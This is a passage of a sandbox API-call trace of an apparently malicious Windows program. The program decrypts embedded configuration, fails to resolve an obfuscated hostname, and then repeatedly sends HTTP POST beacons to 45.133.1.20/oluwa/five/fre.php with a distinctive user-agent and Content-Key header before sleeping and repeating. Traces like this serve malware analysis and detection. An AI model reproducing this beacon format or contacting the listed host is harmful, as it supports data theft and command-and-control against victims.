lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0304.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.140] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0304.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.141] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0304.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.142] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0304.143] GetProcessHeap () returned 0x6a0000 [0304.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.144] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.145] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.273] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.276] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.276] GetProcessHeap () returned 0x6a0000 [0304.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0304.276] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.277] GetProcessHeap () returned 0x6a0000 [0304.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0304.278] GetProcessHeap () returned 0x6a0000 [0304.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.278] GetProcessHeap () returned 0x6a0000 [0304.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0304.279] GetProcessHeap () returned 0x6a0000 [0304.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0304.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.291] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0304.302] GetProcessHeap () returned 0x6a0000 [0304.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0304.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.304] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0304.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.305] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.307] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.307] GetProcessHeap () returned 0x6a0000 [0304.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0304.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.309] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0304.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.311] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0304.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.312] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0304.312] GetProcessHeap () returned 0x6a0000 [0304.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.313] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0304.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.315] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0304.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.316] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0304.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.349] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0304.349] GetProcessHeap () returned 0x6a0000 [0304.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0304.349] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0304.349] GetProcessHeap () returned 0x6a0000 [0304.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0304.349] socket (af=2, type=1, protocol=6) returned 0xb84 [0304.350] connect (s=0xb84, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0304.388] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0304.388] GetProcessHeap () returned 0x6a0000 [0304.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0304.389] GetProcessHeap () returned 0x6a0000 [0304.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0304.389] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.390] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.390] GetProcessHeap () returned 0x6a0000 [0304.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6900 [0304.390] GetProcessHeap () returned 0x6a0000 [0304.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.391] GetProcessHeap () returned 0x6a0000 [0304.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0304.391] GetProcessHeap () returned 0x6a0000 [0304.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0304.392] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.393] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.393] GetProcessHeap () returned 0x6a0000 [0304.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0304.393] GetProcessHeap () returned 0x6a0000 [0304.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.393] send (s=0xb84, buf=0x6bd460*, len=242, flags=0) returned 242 [0304.394] send (s=0xb84, buf=0x6bb998*, len=159, flags=0) returned 159 [0304.394] GetProcessHeap () returned 0x6a0000 [0304.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0304.394] recv (in: s=0xb84, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0304.473] GetProcessHeap () returned 0x6a0000 [0304.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0304.476] GetProcessHeap () returned 0x6a0000 [0304.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0304.476] GetProcessHeap () returned 0x6a0000 [0304.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6900 | out: hHeap=0x6a0000) returned 1 [0304.476] GetProcessHeap () returned 0x6a0000 [0304.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0304.477] closesocket (s=0xb84) returned 0 [0304.477] GetProcessHeap () returned 0x6a0000 [0304.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0304.477] GetProcessHeap () returned 0x6a0000 [0304.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.478] GetProcessHeap () returned 0x6a0000 [0304.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0304.478] GetProcessHeap () returned 0x6a0000 [0304.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0304.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18bc) returned 0xb84 [0304.481] Sleep (dwMilliseconds=0xea60) [0304.482] GetProcessHeap () returned 0x6a0000 [0304.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0304.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.491] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0304.502] GetProcessHeap () returned 0x6a0000 [0304.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0304.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.503] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0304.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.510] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.510] GetProcessHeap () returned 0x6a0000 [0304.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0304.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.513] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0304.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.515] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0304.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.523] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0304.523] GetProcessHeap () returned 0x6a0000 [0304.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.525] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.527] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.532] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.533] GetProcessHeap () returned 0x6a0000 [0304.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0304.533] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.534] GetProcessHeap () returned 0x6a0000 [0304.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0304.535] GetProcessHeap () returned 0x6a0000 [0304.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.535] GetProcessHeap () returned 0x6a0000 [0304.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0304.536] GetProcessHeap () returned 0x6a0000 [0304.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0304.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.548] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0304.560] GetProcessHeap () returned 0x6a0000 [0304.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0304.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.562] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0304.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.563] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.564] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.564] GetProcessHeap () returned 0x6a0000 [0304.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0304.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.583] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0304.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.584] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0304.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.586] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0304.586] GetProcessHeap () returned 0x6a0000 [0304.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.587] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0304.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.589] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0304.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.593] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0304.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.594] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0304.594] GetProcessHeap () returned 0x6a0000 [0304.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0304.594] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0304.594] GetProcessHeap () returned 0x6a0000 [0304.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0304.594] socket (af=2, type=1, protocol=6) returned 0xb88 [0304.595] connect (s=0xb88, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0304.621] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0304.621] GetProcessHeap () returned 0x6a0000 [0304.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0304.621] GetProcessHeap () returned 0x6a0000 [0304.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0304.623] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.625] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.625] GetProcessHeap () returned 0x6a0000 [0304.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b69c0 [0304.625] GetProcessHeap () returned 0x6a0000 [0304.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.626] GetProcessHeap () returned 0x6a0000 [0304.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0304.626] GetProcessHeap () returned 0x6a0000 [0304.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0304.626] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.698] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.698] GetProcessHeap () returned 0x6a0000 [0304.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0304.698] GetProcessHeap () returned 0x6a0000 [0304.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.712] send (s=0xb88, buf=0x6bd460*, len=242, flags=0) returned 242 [0304.713] send (s=0xb88, buf=0x6bb998*, len=159, flags=0) returned 159 [0304.714] GetProcessHeap () returned 0x6a0000 [0304.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0304.714] recv (in: s=0xb88, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0304.796] GetProcessHeap () returned 0x6a0000 [0304.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0304.796] GetProcessHeap () returned 0x6a0000 [0304.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0304.796] GetProcessHeap () returned 0x6a0000 [0304.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b69c0 | out: hHeap=0x6a0000) returned 1 [0304.797] GetProcessHeap () returned 0x6a0000 [0304.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0304.797] closesocket (s=0xb88) returned 0 [0304.798] GetProcessHeap () returned 0x6a0000 [0304.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0304.798] GetProcessHeap () returned 0x6a0000 [0304.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.798] GetProcessHeap () returned 0x6a0000 [0304.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0304.799] GetProcessHeap () returned 0x6a0000 [0304.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0304.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c4) returned 0xb88 [0304.802] Sleep (dwMilliseconds=0xea60) [0304.804] GetProcessHeap () returned 0x6a0000 [0304.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0304.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0304.838] GetProcessHeap () returned 0x6a0000 [0304.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0304.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.839] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0304.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.840] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.841] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.841] GetProcessHeap () returned 0x6a0000 [0304.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0304.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.842] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0304.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.845] CryptDestroyKey (hKey=0x6ad020) returned 1 [0304.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.846] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0304.846] GetProcessHeap () returned 0x6a0000 [0304.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.847] StrStrA 